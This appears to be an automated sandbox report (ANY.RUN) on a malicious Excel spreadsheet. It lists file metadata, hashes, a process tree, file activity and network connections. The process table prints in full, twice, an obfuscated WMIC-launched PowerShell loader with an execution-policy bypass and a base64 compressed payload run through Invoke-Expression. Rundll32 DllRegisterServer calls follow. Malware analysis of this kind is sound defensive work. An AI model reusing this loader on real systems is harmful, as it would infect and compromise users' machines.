File name: | sample2.XLS |
Full analysis: | https://app.any.run/tasks/ba82eb63-55c8-47d1-976f-a40e6a9c7456 |
Verdict: | Malicious activity |
Analysis date: | July 17, 2019, 08:09:16 |
OS: | Windows 10 Professional (build: 16299, 32 bit) |
Tags: | |
Indicators: | |
MIME: | application/vnd.ms-excel |
File info: | Composite Document File V2 Document, Little Endian, Os: Windows, Version 10.0, Code page: 1252, Author: autore, Name of Creating Application: Microsoft Excel, Create Time/Date: Fri Jun 5 19:19:34 2015, Last Saved Time/Date: Tue Jul 16 12:19:40 2019, Security: 0 |
MD5: | 9582B06BFF0F2B43D6693150FCB49C6A |
SHA1: | 2A90CA7964576B9210C8F35234214F32B412684E |
SHA256: | 1145EEE29B0805AFBB9CF03FA578CF79A1F94C43125AE6F3D2867810248FB555 |
SSDEEP: | 3072:PjvlYkRIPPm3eNCZmbpoahZhC0cixIiG0iIFLR8m9xe0VukmBj:rvlYkRIPPm3eNCZmbpoahZhC0cixIiGb |
.xls | | | Microsoft Excel sheet (78.9) |
---|
CompObjUserType: | (Foglio di lavoro di Microsoft Excel 2019 |
---|---|
CompObjUserTypeLen: | 42 |
HeadingPairs: |
|
TitleOfParts: | 20190716-83748 |
HyperlinksChanged: | No |
SharedDoc: | No |
LinksUpToDate: | No |
ScaleCrop: | No |
AppVersion: | 16 |
Company: | - |
CodePage: | Windows Latin 1 (Western European) |
Security: | None |
ModifyDate: | 2019:07:16 11:19:40 |
CreateDate: | 2015:06:05 18:19:34 |
Software: | Microsoft Excel |
Author: | autore |
PID | CMD | Path | Indicators | Parent process |
---|---|---|---|---|
3584 | "C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\admin\Desktop\sample2.XLS" | C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE | explorer.exe | |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft Excel Exit code: 0 Version: 16.0.11328.20158 | ||||
2288 | wMIc 'prOcess' "cALl" crEAtE "powErsHell -NoNiNtErAC -NoPrOFi -WIn 000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000001 -EXECUtIoNpOLiC BYpAsS "\"`$kI="\" + ([ChAR]34).ToSTRing() + "\"MU(YY io.STreAMReadeR((YY IO.MicrosoftSiON.deFlaTestReAm([Io.MemOrYstReAM][CoNveRT]::FROMBaSe64STRInG('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' ) "\" +([Char]44).ToStriNg() +"\" [Io.MicrosoftSiON.MicrosoftsionMODE]::DEMicrosoftS ) ) "\" +([Char]44).ToStriNg() +"\"[TEXt.enCODIng]::aSCii)).READtoeNd()"\" + ([ChAR]34).ToSTRing() + "\".replace('Microsoft'"\" +([Char]44).ToStriNg() +"\"'compres');&('sa'+'l') ('YY') ('nEw-'+'OBjEc'+'T');&('s'+'al') ('MU') ('ie'+'X');MU(`$ki)"\"|& ( $SHeLLid[1]+$shellId[13]+'X')" | C:\WINDOWS\system32\wbem\wMIc.exe | — | WmiPrvSE.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: WMI Commandline Utility Exit code: 0 Version: 10.0.16299.15 (WinBuild.160101.0800) | ||||
1884 | \??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1 | C:\WINDOWS\system32\conhost.exe | wMIc.exe | |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Console Window Host Exit code: 0 Version: 10.0.16299.15 (WinBuild.160101.0800) | ||||
300 | powErsHell -NoNiNtErAC -NoPrOFi -WIn 000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000001 -EXECUtIoNpOLiC BYpAsS "\"`$kI="\" + ([ChAR]34).ToSTRing() + "\"MU(YY io.STreAMReadeR((YY IO.MicrosoftSiON.deFlaTestReAm([Io.MemOrYstReAM][CoNveRT]::FROMBaSe64STRInG('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' ) "\" +([Char]44).ToStriNg() +"\" [Io.MicrosoftSiON.MicrosoftsionMODE]::DEMicrosoftS ) ) "\" +([Char]44).ToStriNg() +"\"[TEXt.enCODIng]::aSCii)).READtoeNd()"\" + ([ChAR]34).ToSTRing() + "\".replace('Microsoft'"\" +([Char]44).ToStriNg() +"\"'compres');&('sa'+'l') ('YY') ('nEw-'+'OBjEc'+'T');&('s'+'al') ('MU') ('ie'+'X');MU(`$ki)"\"|& ( $SHeLLid[1]+$shellId[13]+'X') | C:\WINDOWS\System32\WindowsPowerShell\v1.0\powErsHell.exe | WmiPrvSE.exe | |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows PowerShell Exit code: 0 Version: 10.0.16299.15 (WinBuild.160101.0800) | ||||
2932 | \??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1 | C:\WINDOWS\system32\conhost.exe | powErsHell.exe | |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Console Window Host Exit code: 0 Version: 10.0.16299.15 (WinBuild.160101.0800) | ||||
2716 | "C:\WINDOWS\system32\rundll32.exe" InetCpl.cpl,ClearMyTracksByProcess 260 | C:\WINDOWS\system32\rundll32.exe | — | powErsHell.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows host process (Rundll32) Exit code: 0 Version: 10.0.16299.15 (WinBuild.160101.0800) | ||||
876 | C:\WINDOWS\system32\rundll32.exe C:\WINDOWS\system32\inetcpl.cpl,ClearMyTracksByProcess Flags:260 WinX:0 WinY:0 IEFrame:00000000 | C:\WINDOWS\system32\rundll32.exe | — | rundll32.exe |
User: admin Company: Microsoft Corporation Integrity Level: LOW Description: Windows host process (Rundll32) Exit code: 0 Version: 10.0.16299.15 (WinBuild.160101.0800) | ||||
2816 | "C:\WINDOWS\system32\rundll32.exe" /s DllRegisterServer | C:\WINDOWS\system32\rundll32.exe | — | powErsHell.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows host process (Rundll32) Exit code: 0 Version: 10.0.16299.15 (WinBuild.160101.0800) |
PID | Process | Filename | Type | |
---|---|---|---|---|
3584 | EXCEL.EXE | C:\Users\admin\AppData\Local\Temp\~DFBAB28A1EBD66D486.TMP | — | |
MD5:— | SHA256:— | |||
3584 | EXCEL.EXE | C:\Users\admin\AppData\Local\Temp\~DF9F7FAD2EFEC7CF08.TMP | — | |
MD5:— | SHA256:— | |||
3584 | EXCEL.EXE | C:\Users\admin\AppData\Local\Temp\~DFFBDD964F06772CA5.TMP | — | |
MD5:— | SHA256:— | |||
300 | powErsHell.exe | C:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_ryg14jvq.1os.ps1 | — | |
MD5:— | SHA256:— | |||
300 | powErsHell.exe | C:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_hzemd0xy.re1.psm1 | — | |
MD5:— | SHA256:— | |||
3584 | EXCEL.EXE | C:\Users\admin\AppData\Local\Temp\~DFC14294E119C60A57.TMP | — | |
MD5:— | SHA256:— | |||
3584 | EXCEL.EXE | C:\Users\admin\AppData\Local\Temp\~DF43045BA7075E7D88.TMP | — | |
MD5:— | SHA256:— | |||
3584 | EXCEL.EXE | C:\Users\admin\AppData\Local\Temp\~DFFB82929A953C79CB.TMP | — | |
MD5:— | SHA256:— | |||
3584 | EXCEL.EXE | C:\Users\admin\AppData\Local\Microsoft\Office\OTele\excel.exe.db-shm | — | |
MD5:— | SHA256:— | |||
3584 | EXCEL.EXE | C:\Users\admin\AppData\Local\Microsoft\Office\OTele\excel.exe.db-wal | — | |
MD5:— | SHA256:— |
PID | Process | Method | HTTP Code | IP | URL | CN | Type | Size | Reputation |
---|---|---|---|---|---|---|---|---|---|
— | — | GET | 200 | 93.184.220.29:80 | http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBTBL0V27RVZ7LBduom%2FnYB45SPUEwQU5Z1ZMIJHWMys%2BghUNoZ7OrUETfACEA8sEMlbBsCTf7jUSfg%2BhWk%3D | US | der | 1.47 Kb | whitelisted |
PID | Process | IP | Domain | ASN | CN | Reputation |
---|---|---|---|---|---|---|
— | — | 93.184.220.29:80 | ocsp.digicert.com | MCI Communications Services, Inc. d/b/a Verizon Business | US | whitelisted |
3584 | EXCEL.EXE | 13.107.3.128:443 | config.edge.skype.com | Microsoft Corporation | US | whitelisted |
— | — | 40.90.23.213:443 | login.live.com | Microsoft Corporation | US | unknown |
3584 | EXCEL.EXE | 52.109.124.20:443 | nexusrules.officeapps.live.com | Microsoft Corporation | SG | whitelisted |
